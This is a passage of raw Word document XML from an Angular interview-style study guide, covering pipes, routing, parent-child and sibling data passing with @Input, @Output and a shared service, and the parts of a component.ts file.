    <w:p w14:paraId="770DE295"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Provided using </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA5407"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njectable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093691F3"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UserService { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89BEFE" w14:textId="77777777" w:rsidR="003B3B1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A4CF0D2">
          <v:rect id="_x0000_i3484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870D416" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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7. Pipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B854A94"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ransforms data in templates (e.g., {{ dateValue | date }}).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638AC989" w14:textId="77777777" w:rsidR="003B3B1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4BF6E5A">
          <v:rect id="_x0000_i3485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E626855" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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8. Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00495D60"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Angular Router manages navigation between views (pages/components).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FCCD9"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st routes: Routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB25150"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 path: 'home', component: HomeComponent },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE63FEA"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lastRenderedPageBreak/>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2EB57E" w14:textId="77777777" w:rsidR="003B3B1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EF91FCE">
          <v:rect id="_x0000_i3486" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5998A" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720FF2C9"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Angular Component = Class + Template + Styles + Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1F6F0"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Let me know if you want a visual component diagram or folder structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BD35F" w14:textId="0043FDF5" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="70F4F410">
          <v:rect id="_x0000_i3487" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34EEB6" w14:textId="34758BC9" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF250E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="859" w:name="_Toc196308339"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to pass data from components in Angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="859"/>
    </w:p>
    <w:p w14:paraId="567E13AF" w14:textId="3A1BF61B" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In Angular, data can be passed between components using several standard mechanisms depending on the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direction of communication</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC602CE" w14:textId="77777777" w:rsidR="003B3B1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D026EAD">
          <v:rect id="_x0000_i3488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="706677B1" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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1. Parent to Child (Input Binding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260ABFDB"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Use the @Input() decorator to pass data </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from parent to child component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F0676" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Parent Component Template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F577E70"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lt;app-child [childMessage]="parentData"&gt;&lt;/app-child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A508D" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Child Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D10FE18"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nput() childMessage: string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0ECDC" w14:textId="77777777" w:rsidR="003B3B1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15CDCD5">
          <v:rect id="_x0000_i3489" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB7D6E" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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2. Child to Parent (Output Binding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC79FB5"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Use the @Output() decorator with EventEmitter to send data </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from child to parent component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446A5D0" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Child Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55540C34"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Output() messageEvent = new EventEmitter&lt;string&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465199C" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05942CAC"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sendMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20828267"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his.messageEvent.emit('Hello from child');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D15A92"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7F8C72DE" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Parent Component Template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1FBB10"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lt;app-child (messageEvent)="receiveMessage($event)"&gt;&lt;/app-child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E583DF0" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Parent Component Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CF3F5"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ceiveMessage($event: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537DAB0"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his.receivedMessage = $event;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD863A"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19A33551" w14:textId="77777777" w:rsidR="003B3B1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290A621">
          <v:rect id="_x0000_i3490" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25411A87" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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3. Sibling Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA36610"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Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shared service</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Subject or BehaviorSubject for communication between sibling components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F566C" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Shared Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F32235"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njectable({ providedIn: 'root' })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B743534"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DataService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429DF95"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private dataSource = new BehaviorSubject&lt;string&gt;('default');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05735337"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currentData = this.dataSource.asObservable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C10AA" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65281FA0"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changeData(data: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F521D1C"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his.dataSource.next(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3388CD"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0013DAD9"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14BF570E" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Sibling Component A (Sender):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B6B9D"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structor(private dataService: DataService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC17A9" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E846376"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sendData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E88EEF"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his.dataService.changeData('Hello from A');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0521F"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501B4D4C" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Sibling Component B (Receiver):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427134E0"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structor(private dataService: DataService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C064E2B" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F18476"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ngOnInit() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14738F97"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  this.dataService.currentData.subscribe(data =&gt; this.receivedData = data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30585CD6"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48EE546F" w14:textId="77777777" w:rsidR="003B3B1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2421628">
          <v:rect id="_x0000_i3491" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A063B" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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4. Using Router Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393DF274"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For passing data during navigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3112" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Navigate with Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE64CB7"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his.router.navigate(['/details', id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419E5C4" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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Access in Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00906F84"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his.route.params.subscribe(params =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012D03A"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const id = params['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB2088" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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4A4D1A88" w14:textId="29DC5931" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="69CE493B">
          <v:rect id="_x0000_i3492" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33414009" w14:textId="0C1DC9AA" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00B91568">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="860" w:name="_Toc196308340"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What does the component.ts file contain in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="860"/>
    </w:p>
    <w:p w14:paraId="1389CB0F" w14:textId="39811154" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The component.ts file in Angular defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logic and behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a component. It’s the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file that contains metadata, properties, methods, and lifecycle hooks for the component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FC735" w14:textId="77777777" w:rsidR="00FD3000"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C745151">
          <v:rect id="_x0000_i3493" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9FE0B" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000"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Typical Structure of a component.ts file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23B1E8"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 Component, OnInit } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CD6D0" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6379D8FB"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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485F2D8"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selector: 'app-example',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C22442"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emplateUrl: './example.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF5BF01"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styleUrls: ['./example.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD9110"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4AA2C47D"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ExampleComponent implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158D9A8" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A2F19A"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 Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B662F"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itle: string = 'My Angular Component';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2BC641"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count: number = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466199C2" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295481C4"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 Constructor (used for dependency injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A031153"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constructor() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC5DD1" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F67EB67"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 Lifecycle Hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE850A"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ngOnInit(): void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5802BA6E"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console.log('Component initialized');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6FA14"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35A4D597" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA2D34E"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 Custom Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74911BD1"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incrementCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE521E0"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his.count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A517F71"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0392EFA4"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37001509" w14:textId="77777777" w:rsidR="00FD3000"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5606180">
          <v:rect id="_x0000_i3494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933C56D" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000"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Breakdown of Key Elem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7"/>
        <w:gridCol w:w="8877"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="6E8CD87A" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7229A130" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000"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Part</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4219B04A" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="082EB0EA" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C59B91B"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mponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="091F1329"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Decorator that marks the class as a component and provides metadata like selector, template, and style.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="375DB953" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
